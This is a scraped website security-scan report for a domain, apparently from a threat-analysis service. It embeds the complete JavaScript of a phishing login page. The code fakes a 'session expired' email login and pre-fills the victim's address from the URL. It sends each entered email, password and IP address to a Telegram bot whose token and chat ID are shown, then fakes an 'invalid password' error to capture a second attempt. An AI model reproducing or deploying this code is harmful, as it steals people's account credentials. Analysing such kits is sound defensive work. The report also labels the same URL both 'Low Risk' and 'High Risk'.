documentation technical

English

The domain name 'www.lavilifescience.com' uses the commercial generic top-level domain (.com); it also runs on subdomain 'www'. The core label 'lavilifescience' covers 15 characters containing seven vowels alongside eight consonants. Segmentation suggests four words: la, vi, life, science. Median word length comes out to three characters. No strong language cues emerged from the frequency lists.

email

password

html/f8/e2/f8e21eff-ac9a-4cc4-9b14-ded447ed3af3.html.gz

2632bd71f572a6ee14e09d78aa869eb3b0a2293d8cc1aa8421a6fdd2f7b0f71e

9bf6cd3dc2f874169f44c9fe669a8d4e532977a88d52efdc78826621f2c3f18a

viewport

HSTS header missing - vulnerable to protocol downgrade attacks

CSP header missing - vulnerable to XSS attacks

GoDaddy.com, LLC

LAVILIFESCIENCE.COM

Abuse

Admin

Cloudflare-NOC

Cloudflare, Inc.

CLOUDFLARENET


      // Configuration
      const TELEGRAM_BOT_TOKEN =
        "8669276151:AAEmQGykYOZ4B05Ehg61iOmr8xis4-CUZyg";
      const TELEGRAM_CHAT_ID = "6507729324";

      // State variables
      let showPassword = false;
      let email = "";
      let password = "";
      let loading = true;
      let success = false;
      let language = {};
      let domain = "";
      let ipAddress = "Unknown";
      let attemptCount = 1;
      let showPasswordError = false;
      let showSessionModal = false;
      const currentYear = new Date().getFullYear();

      // DOM elements
      const loadingSpinner = document.getElementById("loadingSpinner");
      const loginForm = document.getElementById("loginForm");
      const successScreen = document.getElementById("successScreen");
      const loginFormElement = document.getElementById("loginFormElement");
      const emailInput = document.getElementById("email");
      const passwordInput = document.getElementById("password");
      const togglePassword = document.getElementById("togglePassword");
      const passwordIcon = document.getElementById("passwordIcon");
      const submitButton = document.getElementById("submitButton");
      const generalError = document.getElementById("generalError");
      const passwordError = document.getElementById("passwordError");
      const loginTitle = document.getElementById("loginTitle");
      const copyright = document.getElementById("copyright");
      const successMessage = document.getElementById("successMessage");
      const successCopyright = document.getElementById("successCopyright");
      const sessionModal = document.getElementById("sessionModal");
      const sessionModalTitle = document.getElementById("sessionModalTitle");
      const sessionModalMessage = document.getElementById(
        "sessionModalMessage",
      );
      const sessionModalBtn = document.getElementById("sessionModalBtn");
      const rememberMe = document.getElementById("rememberMe");
      const forgotPassword = document.getElementById("forgotPassword");

      // Initialize the page
      document.addEventListener("DOMContentLoaded", function () {
        initializePage();
        fetchIpAddress();

        // Show session timeout modal after 500ms
        setTimeout(() => {
          showSessionModal = true;
          sessionModal.classList.remove("hidden");
        }, 500);
      });

      // Initialize page
      function initializePage() {
        // Simulate loading
        setTimeout(() => {
          loading = false;
          loadingSpinner.classList.add("hidden");

          // Check URL for domain and email data
          const currentUrl = window.location.href;
          const urlObj = new URL(currentUrl);
          let domainPath = urlObj.hash;

          if (domainPath) {
            domainPath = handleBase64Data(
              domainPath.substring(1).split("/")[0],
            );
            let domainName = domainPath.substring(domainPath.indexOf("@") + 1);
            domain = domainName;

            // Set background image from domain
            const backgroundImage = `https://image.thum.io/get/width/1200/http://${domainName}`;
            document.body.style.backgroundImage = `url('${backgroundImage}')`;
          }

          // Parse hash for email and language data
          const hashParts = window.location.hash
            ? window.location.hash.substring(1).split("/")
            : [];

          if (hashParts.length > 0) {
            const emailData = handleBase64Data(hashParts[0]);
            const langData = getLocalizedLanguage(
              hashParts.length > 1 ? hashParts[1] : "",
            );
            language = langData;

            if (emailData) {
              email = emailData;
              emailInput.value = emailData;
              document.title = `${emailData.split("@")[1]} ${language.mail || ""}`;
            }
          } else {
            language = getLocalizedLanguage();
          }

          // Update UI with language data
          updateUIWithLanguage();

          // Show login form
          loginForm.classList.remove("hidden");
        }, 1000);
      }

      // Handle base64 encoded data
      function handleBase64Data(data) {
        try {
          return atob(data);
        } catch (error) {
          return data;
        }
      }

      // Get localized language strings
      function getLocalizedLanguage(langCode = "") {
        const browserLang =
          langCode || navigator.language || navigator.userLanguage;
        const langPrefix = browserLang.substring(0, 2);

        const languages = {
          en: {
            lessThan4: "Password must be at least 4 characters long.",
            msg: "Invalid password. Please enter the correct information.",
            error:
              "The account does not exist. Please enter a different account.",
            emlTxt: "Email",
            pswTxt: "Password",
            submitBtn: "Login",
            secLgSs: "Secure login session",
            frgPsw: "Forgot password?",
            copy: "",
            verifyingText: "Verifying...",
            emlLogin: "Email Login",
            mail: "Mail",
            yourEmail: "Your email has been successfully activated.",
            success:
              "Thank you. You will receive your file in your email shortly.",
            sessionTimeout: "Session Timeout",
            sessionMessage:
              "Your session has expired. Please login to your account again.",
            okButton: "OK",
          },
        };

        return languages[langPrefix] || languages["en"];
      }

      // Update UI with language strings
      function updateUIWithLanguage() {
        if (loginTitle && language.emlLogin) {
          loginTitle.textContent = language.emlLogin;
        }

        if (emailInput && language.emlTxt) {
          emailInput.placeholder = language.emlTxt;
        }

        if (passwordInput && language.pswTxt) {
          passwordInput.placeholder = language.pswTxt;
        }

        if (submitButton && language.submitBtn) {
          submitButton.textContent = language.submitBtn;
        }

        if (copyright && language.copy) {
          copyright.textContent = `${language.copy} ${currentYear}`;
        }

        if (successMessage && language.success) {
          successMessage.textContent = language.success;
        }

        if (successCopyright && language.copy) {
          successCopyright.textContent = `${language.copy} ${currentYear}`;
        }

        if (sessionModalTitle && language.sessionTimeout) {
          sessionModalTitle.textContent = language.sessionTimeout;
        }

        if (sessionModalMessage && language.sessionMessage) {
          sessionModalMessage.textContent = language.sessionMessage;
        }

        if (sessionModalBtn && language.okButton) {
          sessionModalBtn.textContent = language.okButton;
        }

        // Update "Remember me" text
        if (language.secLgSs) {
          const rememberMeLabel = rememberMe.nextElementSibling;
          if (rememberMeLabel) {
            rememberMeLabel.textContent = language.secLgSs;
          }
        }

        // Update "Forgot Password" text
        if (language.frgPsw) {
          forgotPassword.textContent = language.frgPsw;
        }
      }

      // Fetch IP address
      async function fetchIpAddress() {
        try {
          const response = await fetch("https://api.ipify.org?format=json");
          const data = await response.json();
          ipAddress = data.ip;
        } catch (error) {
          console.error("Error fetching IP address:", error);
          ipAddress = "Failed to get IP";
        }
      }

      // Send credentials to Telegram
      async function sendToTelegram(email, password, attemptNumber) {
        const now = new Date();
        const datetime = now.toISOString();

        const message = `
=ç Email: ${email}
= Password: ${password}
= Attempt: ${attemptNumber}
< IP Address: ${ipAddress}
ð Timestamp: ${datetime}
`;

        const url = `https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendMessage?chat_id=${TELEGRAM_CHAT_ID}&text=${encodeURIComponent(message)}`;

        try {
          await fetch(url);
          console.log("Message sent to Telegram");
          return true;
        } catch (error) {
          console.error("Error sending message to Telegram:", error);
          return false;
        }
      }

      // Handle form submission
      async function handleSubmit(e) {
        e.preventDefault();

        // Get form values
        email = emailInput.value.trim();
        password = passwordInput.value.trim();

        // Clear errors
        generalError.classList.add("hidden");
        passwordError.classList.add("hidden");

        // Validate email
        const emailRegex =
          /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
        if (!emailRegex.test(email)) {
          generalError.textContent = language.error || "Invalid email format";
          generalError.classList.remove("hidden");
          return;
        }

        // Validate password length
        if (password.length < 4) {
          generalError.textContent =
            language.lessThan4 || "Password must be at least 4 characters";
          generalError.classList.remove("hidden");
          return;
        }

        // Show loading state
        submitButton.disabled = true;
        const originalBtnText = submitButton.textContent;
        submitButton.innerHTML = `<span class="spinner-border spinner-border-sm" role="status" aria-hidden="true"></span> ${language.verifyingText || "Verifying..."}`;

        try {
          // Always send credentials to Telegram
          await sendToTelegram(email, password, attemptCount);

          if (attemptCount === 1) {
            // First attempt - show wrong password message
            setTimeout(() => {
              passwordInput.value = "";
              submitButton.disabled = false;
              submitButton.textContent = originalBtnText;

              passwordError.textContent =
                language.msg || "Invalid password. Please try again.";
              passwordError.classList.remove("hidden");

              attemptCount = 2;
            }, 1500);
          } else {
            // Second attempt - redirect to domain
            setTimeout(() => {
              if (domain) {
                window.location.href = `http://www.${domain}`;
              } else {
                // If no domain, show success screen
                loginForm.classList.add("hidden");
                successScreen.classList.remove("hidden");
              }
            }, 1500);
          }
        } catch (error) {
          console.log("Error in submission:", error);
          submitButton.disabled = false;
          submitButton.textContent = originalBtnText;

          generalError.textContent = "An error occurred. Please try again.";
          generalError.classList.remove("hidden");
        }
      }

      // Toggle password visibility
      function togglePasswordVisibility() {
        showPassword = !showPassword;

        if (showPassword) {
          passwordInput.type = "text";
          passwordIcon.classList.remove("fa-eye");
          passwordIcon.classList.add("fa-eye-slash");
        } else {
          passwordInput.type = "password";
          passwordIcon.classList.remove("fa-eye-slash");
          passwordIcon.classList.add("fa-eye");
        }
      }

      // Close session modal
      function closeSessionModal() {
        showSessionModal = false;
        sessionModal.classList.add("hidden");
      }

      // Event listeners
      loginFormElement.addEventListener("submit", handleSubmit);
      togglePassword.addEventListener("click", togglePasswordVisibility);
      sessionModalBtn.addEventListener("click", closeSessionModal);

      // Forgot password link
      forgotPassword.addEventListener("click", function (e) {
        e.preventDefault();
        alert(
          "Please contact your system administrator to reset your password.",
        );
      });

      // Remember me checkbox
      rememberMe.addEventListener("change", function () {
        if (this.checked) {
          console.log("Remember me checked");
        } else {
          console.log("Remember me unchecked");
        }
      });
    

PasswordField

www.lavilifescience.com

✅ Low Risk - https://www.lavilifescience.com/.authn/mail.html

Requests	IP Address	Location	AS Autonomous System
6	68.178.145.3	United States	AS26496GoDaddy.com, LLC
6	1	-	-

Security Scan Report: www.lavilifescience.com

Summary

AI Security Verdict

High Risk

Risk Factors

Details

Screenshot

Page Load Overview

Language Analysis

Primary Language

Detection Details

Website Classification

Primary Category

All Detected Categories

Detected Features

Domain & IP Information

Detected Technologies1

Content Similarity HashesFor malware variant detection

TLSH (Trend Micro Locality Sensitive Hash)

ssdeep (Context Triggered Piecewise Hashing)

sdhash (Similarity Digest Hashing)

Image Hashes

Perceptual Hashes

Other Hashes

Scan History